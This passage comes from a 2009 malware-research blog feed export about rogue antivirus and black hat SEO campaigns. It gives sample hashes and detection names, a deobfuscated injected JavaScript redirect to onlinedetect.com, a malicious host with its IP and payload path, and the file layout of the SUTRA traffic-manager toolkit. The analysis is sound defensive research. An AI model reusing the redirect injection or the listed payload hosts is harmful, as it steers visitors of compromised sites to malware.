width="33"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;442368 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;8e428574cb9e4f680d1e28fe3ca673e8&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/33a9dac2323aeac19dc05b98e315344f" target="_blank"&gt;First Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/3573bbf5777a8a912a6affb97fae9f74" target="_blank"&gt;Second Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td&gt;03.24.2009 16:12:30 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td&gt;Result: 20/39 (51.29%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Second time&lt;/td&gt;&lt;td&gt;03.30.2009 05:23:52 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td&gt;Result: 20/39 (51.29%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FraudPack.ify&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FakeAV.iy&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan:Win32/FakePlus&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Screenshot:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdAkR0ATqGI/AAAAAAAAARA/8r-vV_AETA8/s1600-h/AntivirusPlusSetup.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 248px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdAkR0ATqGI/AAAAAAAAARA/8r-vV_AETA8/s320/AntivirusPlusSetup.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318791048360863842" /&gt;&lt;/a&gt;  &lt;br /&gt;  &lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdBDV3mtVjI/AAAAAAAAARI/uGY49iJYW0w/s1600-h/FakeWindowsSecurityCenter-AntivirusPlus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdBDV3mtVjI/AAAAAAAAARI/uGY49iJYW0w/s320/FakeWindowsSecurityCenter-AntivirusPlus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318825202907174450" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-2537836824437927482?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/2537836824437927482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/2537836824437927482'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p3.html' title='Black Hat SEO and Rogue Antivirus p.3'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGXhhCI/AAAAAAAAAQ4/oYQGr3c6cnA/s72-c/yournetascertain.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-8868103722338169774</id><published>2009-03-28T20:15:00.000-07:00</published><updated>2009-03-28T20:17:36.878-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='W3C hack'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website rogue antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware campaign'/><category scheme='http://www.blogger.com/atom/ns#' term='IFRAME injected'/><category scheme='http://www.blogger.com/atom/ns#' term='World Wide Web Consortium hack'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='massive attack'/><title type='text'>Black Hat SEO and Rogue Antivirus p.2</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The World Wide Web Consortium and Rogue AV&lt;br /&gt;&lt;/p&gt;&lt;table width="546" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="546"&gt;&lt;p&gt; &lt;u&gt;Having your website hacked with IFRAME injected, trojans/backdoors?&lt;br /&gt;&lt;br /&gt;Having your pages infected with redirection to  rogue antivirus/antispyware? &lt;br /&gt;&lt;br /&gt;
Having your pages replaced with World Wide Web Consortium article and  some &lt;br /&gt;obfuscated javascript code append to them?&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro)&lt;br /&gt;&lt;br /&gt;Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page.&lt;br /&gt;  &lt;br /&gt;All info concluded that the attack was made via stolen FTP password, on all these domains.&lt;br /&gt;&lt;br /&gt;An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated.&lt;br /&gt;&lt;br /&gt;You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" title="The silent threat: Black Hat SEO and Rogue Antivirus"&gt;The silent threat: Black Hat SEO and Rogue AV - 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="The silent threat: Black Hat SEO and Rogue Antivirus"&gt;The silent threat: Black Hat SEO and Rogue AV - 2&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;  *********************&lt;br /&gt;  &lt;br /&gt;  
Screenshot below show  tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5WT8yQwXI/AAAAAAAAAOY/aBSeRQo1zpA/s1600-h/W3C-hack.jpg"&gt;&lt;img src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5WT8yQwXI/AAAAAAAAAOY/aBSeRQo1zpA/s320/W3C-hack.jpg" alt="" width="120" height="400" border="0"id="BLOGGER_PHOTO_ID_5318283110705578354" style="cursor:pointer; cursor:hand;width: 120px; height: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; Source of on of these site.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmemQ6qI/AAAAAAAAAOg/DgpxqgnEHtI/s1600-h/W3C-hack2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmemQ6qI/AAAAAAAAAOg/DgpxqgnEHtI/s320/W3C-hack2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318285628042963618" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmglY7oI/AAAAAAAAAOo/8LA_w-4zxb0/s1600-h/W3C-hack3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmglY7oI/AAAAAAAAAOo/8LA_w-4zxb0/s320/W3C-hack3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318285628576165506" /&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmemQ6qI/AAAAAAAAAOg/DgpxqgnEHtI/s1600-h/W3C-hack2.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In a browser.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5aalgRl4I/AAAAAAAAAOw/wmx7rbJyHvs/s1600-h/W3C-hack4.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 134px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5aalgRl4I/AAAAAAAAAOw/wmx7rbJyHvs/s320/W3C-hack4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318287622761715586" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Deobfuscation results:&lt;br /&gt;&lt;br /&gt;window.location = encodeURI(&lt;br /&gt;&amp;quot;http://www.onlinedetect.com/in.cgi?7&amp;amp;tsk=aug-task13-r86-id67-t116-hst-16&amp;amp;type=l&amp;amp;seoref=&amp;quot; + &lt;br /&gt;encodeURIComponent(document.referrer) + &amp;quot;&amp;amp;parameter=$keyword&amp;amp;se=$se&amp;amp;ur=1&amp;amp;HTTP_REFERER=&amp;quot; + &lt;br /&gt;encodeURIComponent(document.URL) + &amp;quot;&amp;amp;default_keyword=XXX&amp;quot;);&lt;br /&gt;&lt;br /&gt;-----------------------&lt;br /&gt;&lt;br /&gt;The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to onlinedetect.com or some domain used in this attack. &lt;br /&gt;You can find information on &lt;a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html"&gt;this page&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-8868103722338169774?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/8868103722338169774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/8868103722338169774'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p2.html' title='Black Hat SEO and Rogue Antivirus p.2'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5WT8yQwXI/AAAAAAAAAOY/aBSeRQo1zpA/s72-c/W3C-hack.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-2480844641804857847</id><published>2009-03-28T20:11:00.000-07:00</published><updated>2009-03-28T20:14:29.361-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cybercrime toolkit'/><category scheme='http://www.blogger.com/atom/ns#' term='SUTRA Traffic Manager'/><category scheme='http://www.blogger.com/atom/ns#' term='sutra cgi'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware campaign'/><category scheme='http://www.blogger.com/atom/ns#' term='compromised websites'/><category scheme='http://www.blogger.com/atom/ns#' term='pdf malware'/><title type='text'>Black Hat SEO - PDF Malware campaign</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="567" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="567" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO -  PDF Malware campaign&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;table width="528" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="528"&gt;&lt;p&gt;Previously in March, Abode has released some security updates addressed to &lt;br /&gt;vulnerabilities and exploits using Adobe Reader. Some links can be found below&lt;br /&gt;&lt;br /&gt;McAfee Avert Labs: &lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/02/19/new-backdoor-attacks-using-pdf-documents/" target="_blank"&gt;New Backdoor Attacks using PDF Documents&lt;/a&gt;&lt;br /&gt;Trend Micro Malware Blog: &lt;a href="http://blog.trendmicro.com/portable-document-format-or-portable-malware-format/" target="_blank"&gt;Portable Document Format or Portable Malware Format?&lt;/a&gt;&lt;br /&gt;SANS Internet Storm Center: &lt;a href="http://isc.sans.org/diary.html?storyid=5902" target="_blank"&gt;Adobe/Acrobat 0-day in the wild?&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Adobe Security Bulletin: &lt;a href="http://www.adobe.com/support/security/advisories/apsa09-01.html" target="_blank"&gt;Buffer overflow issue&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here is a complete example with sreenshots, data and analysis of a website &lt;br /&gt;used in the PDF malware campaign and hosting a malicious application called SUTRA.&lt;br /&gt;&lt;br /&gt;The application also known as &amp;quot;Traffic Management System&amp;quot; is explained by &lt;br /&gt;McAfee AvertLabs on this page: &lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/" target="_blank"&gt;Inside the malicious traffic&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This cybercrime toolkit is actively used to manage traffic from compromised &lt;br /&gt;websites and redirects visitors to exploits code or other malicious URLs with &lt;br /&gt;fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more. &lt;br /&gt;&lt;br /&gt;We have another example of a compromised website explained &lt;a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2189" target="_blank"&gt;here&lt;/a&gt;. &lt;br /&gt;Screenshot of SUTRA can be found.&lt;br /&gt;&lt;br /&gt;***&lt;br /&gt;&lt;br /&gt;Now let's take a look of another website used.&lt;br /&gt;&lt;br /&gt;The site is &amp;quot;salevisitor.net&amp;quot; 89.107.104.10 &lt;br /&gt;[Do not enter  this site unless you know what you are doing]&lt;br /&gt;&lt;br /&gt;The payload is located here 
&amp;quot;salevisitor.net/in.cgi?6&amp;quot; [Unstable - file not found at this time]&lt;br /&gt;&lt;br /&gt;Just for your information, this is the structure of files/folders for SUTRA Traffic Manager
&lt;br /&gt;&lt;/p&gt;&lt;table width="426" height="891" border="0" cellpadding="0" cellspacing="0" &gt;&lt;tr&gt;&lt;td width="156" height="13" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td  height="13" width="270" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;admin&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td  height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;data&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;files&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;install&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;memory&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;stats&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;admin/tmp&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;admin/tmp.web&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;getos.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;in.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;index.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;admin:&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;c.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;center.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;cron&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;cron.sh&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;index.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;panel.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;tmp&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxrwxrwx (777)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;tmp.web&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;ub_fetcher&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;data:&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;admin_forces.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;connection_type.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;connection_type_new.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;crontab_wizard.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;edit_force_data.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; 